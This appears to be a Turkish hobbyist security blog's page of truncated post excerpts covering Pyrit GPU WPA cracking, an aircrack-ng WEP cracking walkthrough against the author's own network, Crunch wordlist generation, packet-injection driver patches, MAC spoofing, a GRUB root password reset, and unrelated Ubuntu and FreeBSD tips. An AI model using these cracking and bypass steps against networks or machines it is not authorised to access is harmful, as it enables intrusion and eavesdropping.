Pyrit ile WPA/WPA2 Kırmak İçin Ekran Kartınızı Kullanın

Pyrit WPA/WPA2-PSK parolalarını kırmak için geliştirilmekte olan bir yazılımdır. En önemli özelliği CPU'ya ek olarak Nvdia ve Ati ekran kartlarının grafik işlemcilerini kullanarak parola kırma işlemi yapmasıdır. Özellikle yeni nesil gelişmiş ekran kartlarıyla oldukça iyi performans verebilir.


Pyrit http://code.google.com/p/pyrit/ indirilebilir ve yine aynı adresten ulaşabileceğiniz kurulum belgesiyle kolaylıkla kurulabilir.  Ubuntu 11.04 üzerine kurulum yaparken bir sıkıntı yaşamadım . Bu nedenle kurulum işlemlerini bir kez de ben tekrarlamıyorum. Kurulum belgesini takip edebilirsiniz.

Pyrit kurulumundan sonra, pyrit list_cores komutuyla sisteminizdeki  kullanılabilir işlemcileri listeleyebilirsiniz.

harun@gondor:~$ pyrit list_cores Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ The following cores seem available... #1:  'CUDA-Device #1 'GeForce 8400M G'' #2:  'CPU-Core (SSE2)&#…

WEP Neden Kolay Kırılır?

WEP şifreleme yöntemi havada uçuşan ve bizim için önemli olan verilerimizi şifrelemek için 40 bitlik gizli anahtar ve açık olmasına rağmen sürekli değişen 24 bitli IV ( Initialization Vector) değerlerini kullanır. Yani standart olarak WEP, 64 bitlik bir şifreleme sağlamaktadır. Şifreleme için ise RC4 simetrik şifreleme algoritması kullanır...

Genellikle kablosuz ağ cihazı üreticileri, 40 bitlik şifreleme anahtarı yerine 104 bitlik şifreleme anahtarı kullanmayı tercih ederler. Bu durumda WEP, 128 bitlik şifreleme yeteneğine sahip olur...

 WEP türleri ve kullanılan anahtar uzunlukları aşağıdaki tabloda verilmiştir.

TürAnahtar UzunluğuHex Uzunluğu ASCII Uzunluğu64 Bit40 Bit105128 Bit 104 Bit2613256 Bit232 Bit5829
WEP için şifreleme işlemi şu şekilde işlemektedir.
1- Gizli Anahtar + IV 2- Gizli Anahtar + IV toplamı RC4 ile şifrelenir. 3- Elde edilen RC4 çıktısı ile gönderilmek istenen veri XOR işlemine tabi tutulur.
Bu aşamadan sonra veri özgürce havada dolaşmaya başlar. Ancak bu noktada şö…

Aircrack ile WEP Crack

İlk olarak airmon-ng aracıyla wlan0 kablosuz ağ arayüzünden, dinleme ve paket sokuşturma işlemleri için kullanacağımız mon0 isimli sanal ağ arayüzünü oluşturalım.

airmon-ng start wlan0
Bu komutun ardından ekran çıktısı aşağıdaki gibi olacaktır...



Dinleme ve paket sokuşturma işlemlerini yapacağımız mon0 arayüzü oluştuğuna göre şimdi etrafımızdak kablosuz ağları tespit edelim. Bunun için airodum-ng aracını aşağıdaki gibi kullanabiliriz.

airdump-ng mon0

airodump-ng yukarıkdakine benzer şekilde çevrenizdeki kablosuz ağları listeleyecektir. Benim örneğimde yalnızca evde kullandığım kablosuz ağım yer alıyor. Dolayısıyla hedefdeki kablosuz ağ Seker isimli WEP şifreli kablosuz olacak...

Hedef ağı tespit ettikten sonra Ctrl+C tuş kombinasyonuyla airodump-ng aracını durduralım ve daha sonra yalnızca hedef ağı dinleyecek şekilde tekrar başlatalım.

airodump-ng -c 6 --bssid 00:a0:c5:98:1f:f9 -w Seker mon0
Bu komut -c parametresi ile 6. kanalı, --bssid parametresi ile MAC adresi verilen kablosuz ağ no…

Linux Root Password Sıfırlama

Linux makinenizin root parolasın unuttuğunuzda ne olur? Cevap basit büyük sıkıntı olur.

Bu gibi durumlarda makineye fiziksel erişiminiz varsa grub menüsünde küçük bir düzenleme yaparak sistemi açabilir ve root parolasını değiştirebilirsiniz.


Öncelikle sistemi yeniden başlatalım. Yukarıdaki gibi grub menüsü geldiğinde klavyeden "E" tuşuna basarak düzenleme moduna geçelim. Karşımıza aşağıdaki gibi bir menü gelecektir...
 Yukarıdaki menüde işaretlenmiş olan "ro quiet" ifadesini silerek, aşağıda görüldüğü gibi "rw init=/bin/bash" şekline getirelim.
Açılış parametresi olarak "rw init=/bin/bash" değerini eklediğimize göre CTRL+X tuş kombinasyonunu kullanalım ve sistemin açılışını izleyelim. Sistem açıldığında passwd komutu ile root parolamızı değiştirebiliriz.

passwd komutu kullanıcı hesaplarının parolalarını değiştirmek için kullanılan komuttur. "Enter new UNIX password" diyerek sizden yeni parolanızı girmenizi isteyecektir. "Retype new UN…

Crunch ile Wordlist Oluşturmak

Crunch seçilen karakter kümesinden, istenilen uzunlukta parolalar üreten ve bu parolaları bir dosyaya yazarak wordlist oluşturan kullanışlı bir araçtır. Çalışmak için özel bir yetkiye ihtiyaç duymaz. Yalnızca derlenip çalıştırılması yeterlidir. Çalıştığında istenilen karakter kümesinden parolalar üretir ve bir dosyaya yazar.
Oldukça hızlı çalışır ve kolay kullanılır.



Crunch Kurulumu
Öncelikle crunch yazılımını indirelim.
harun@gondor:~$ wget http://garr.dl.sourceforge.net/project/crunch-wordlist/crunch-wordlist/crunch-3.0.1.tgz
İndirme işlemi bittikten sonra crunch-3.0.1.tgz arşivini açalım.

harun@gondor:~$ tar zxvf crunch-3.0.1.tgz crunch3.0/ crunch3.0/Makefile crunch3.0/GPL.TXT crunch3.0/crunch.1 crunch3.0/charset.lst crunch3.0/crunch.cArşivin açılmasıyla oluşan crunch3.0/ dizinine geçelim ve ardından make komutunu vererek derleme işlemini başlatalım.
harun@gondor:~$ cd crunch3.0/ harun@gondor:~/crunch3.0$ make Building binary... /usr/bin/gcc -Wall -lm -pthread -std=c99 -m32 -D_LARGEF…

Ubuntu, Aireplay-ng, iwl4965, mon0 Channel -1 Problemi

Yanlış hatırlamıyorsam Ubuntu 10.04 sürümü sonrasında Linux çekirdeği ve kablosuz ağ sürücülerinin değişmesinden dolayı Intel 4965 AGN wireless kartımla aircrack-ng  düzgün çalışmaz hale gelmişti.  Aireplay-ng ile paket sokuşturma saldırısı yapmak istediğinizde aşağıdaki gibi bir hata alıyordunuz.

21:09:28  mon0 is on channel -1, but the AP uses channel 1
Bu hatayı çözmek için yapılması gerekenler yeni sürücüleri gerekli yamalar ile derlemek ve kurmak.
İlk olarak yeni sürücümüzü indirilerim wireless.kernel.org adresinden indirelim ardından da gerekli yamaları indirip sürücü kaynak kodlarına yama yapalım.

    root@gondor:~# wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2011-06-01.tar.bz2     root@gondor:~# wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch     root@gondor:~# wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch     root@gondor:~# tar jxvf compat-wireless-2011-06-01.tar.bz2     root@gondor:~# cd c…

BSD ve Linux Sistemlerde Mac Adresi Değiştirmek

Linux/Unix sistemlerde, bir ağ arabirimine ait MAC adresini değiştirmek için ifconfig komutu kullanılabilir.

FreeBSD ve PfSense gibi FreeBSD kökenli sistemlerde MAC adresini değiştirmek için aşağıdaki gibi bir komut yeterlidir.
[root@mordor]: ifconfig em0 link 00:11:22:33:44:55Aynı şekilde GNU/Linux sistemlerde mac adresi değiştirmek için ise ifconfig komutu aşağıdaki gibi kullanılabilir.
root@gondor:~# ifconfig eth0 hw ether 00:11:22:33:44:55

Ubuntu Denetim Düğmelerini Sağa Kaydırmak

Ubuntu hangi akla hizmetse yıllardır yerine alıştığımız pencere büyüme, simge durumuna küçültme ve kapatma düğmelerini sol kenara taşımış. Bunca ylın alışkanlığından olsa gerek sol üst kenarda denetim düğmeleri görmek sinirlerimi bozdu.

Sizde benim gibi bu durumdan rahatsız olanlardansanız aşağıdakigibi bir komutla denetim düğmelerinizi ait olduğu yere döndürebilirsiniz.

gconftool-2 –set "/apps/metacity/general/button_layout" –type string ":minimize,maximize,close"Daha fazlası için:

http://www.ubuntugeek.com/quick-and-easy-title-bar-button-side-switching-in-ubuntu-10-04-lucid9-10-karmic.html

FreeBSD Disk Formatlama

FreeBSD diskini bölümlemek formatlamak için kullanılabilecek komutlar. md11 aygıtı yerine kullanmak istediğiniz diskin adını yazmanız gerekiyor… 
fdisk -IB /dev/md11
bsdlabel -wB /dev/md11s1
newfs /dev/md11s1a